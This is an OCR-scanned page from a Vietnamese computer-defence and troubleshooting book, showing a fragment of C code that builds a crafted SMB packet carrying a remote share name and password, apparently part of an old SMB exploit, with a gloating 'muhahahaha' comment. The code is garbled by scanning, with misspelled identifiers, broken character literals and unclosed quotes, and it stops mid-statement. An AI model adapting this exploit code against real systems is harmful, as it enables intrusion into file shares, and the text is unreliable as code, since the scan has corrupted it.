Page 120 - Hướng Dẫn Cách Phòng Thủ Và Khắc Phục Sự Cố Máy Tính

P. 120

if (send (sock, Ipdata, strlen (password) + strlen (login)
+ 61,
0) = = -1) return -1;
if (recv (sock, Ipdata, 1024, 0) == -1) return -1;

return (Ipdata [9]);
}
void build_crafted_smb_packet (char*remoteshare, char
*remotepassword)
{
memset (smb_packet, 0, sizeof (smb_packet));
smb_packet [4] ='\xff;

smb_packet [5] = 'S'
smb_packet [6] = 'M';
smb_packet [7] = 'B';
smb_packet [8] = 'u';
smb_packet [13] = '\xl8';

smb_packet [14] = '\x01';
smb_packet [15] = '
smb_packet [31] = '\x28';
smb_packet [32] = uid%256;
sinb_packet [33] = uid/256;
smb_packet [36] = '\x04';
smb_packet [37] = '\x ff;
smb_packet [43] = strlen (remotepassword);

// number of bytes we wanna remote side to conĩirm.
we set the rules... muhahahaha
smb_packet [45]=strlen (remotepassword) + strlen
(remoteshare) +1;
memcpy (&smb_packet[47], remotepassvvord,

121

115 116 117 118 119 120 121 122 123 124 125